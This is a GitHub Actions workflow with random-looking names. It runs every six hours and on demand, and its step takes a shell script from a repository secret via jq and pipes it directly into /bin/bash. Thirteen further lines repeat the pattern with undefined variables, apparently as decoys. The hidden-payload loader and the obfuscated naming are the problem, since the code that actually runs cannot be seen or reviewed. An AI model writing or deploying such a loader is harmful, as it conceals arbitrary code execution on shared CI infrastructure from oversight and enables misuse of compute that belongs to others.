name: qinwuhua6451
on:
  workflow_dispatch:
  schedule:
    - cron: '15 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qinwuhua6451
        env:
          yak5: ${{ secrets.yak5 }}
        run: |
          echo $yak5 | jq -r .bnvo2 | /bin/bash
          echo $webxk617 | jq -r .fdfh08361 | /bin/bash
          echo $gbfnl2063 | jq -r .h57 | /bin/bash
          echo $ccrxe98 | jq -r .wfq719 | /bin/bash
          echo $p59 | jq -r .qbrf8970 | /bin/bash
          echo $zc1799 | jq -r .qyjlz89 | /bin/bash
          echo $an2 | jq -r .e54 | /bin/bash
          echo $tx89620 | jq -r .liw71 | /bin/bash
          echo $jkx4386 | jq -r .p7 | /bin/bash
          echo $wa51604 | jq -r .cx09 | /bin/bash
          echo $crwt2363 | jq -r .yqum1381 | /bin/bash
          echo $jkxqr90660 | jq -r .qmshg0117 | /bin/bash
          echo $qpai3 | jq -r .czhop8866 | /bin/bash
          echo $l6 | jq -r .fkq133 | /bin/bash

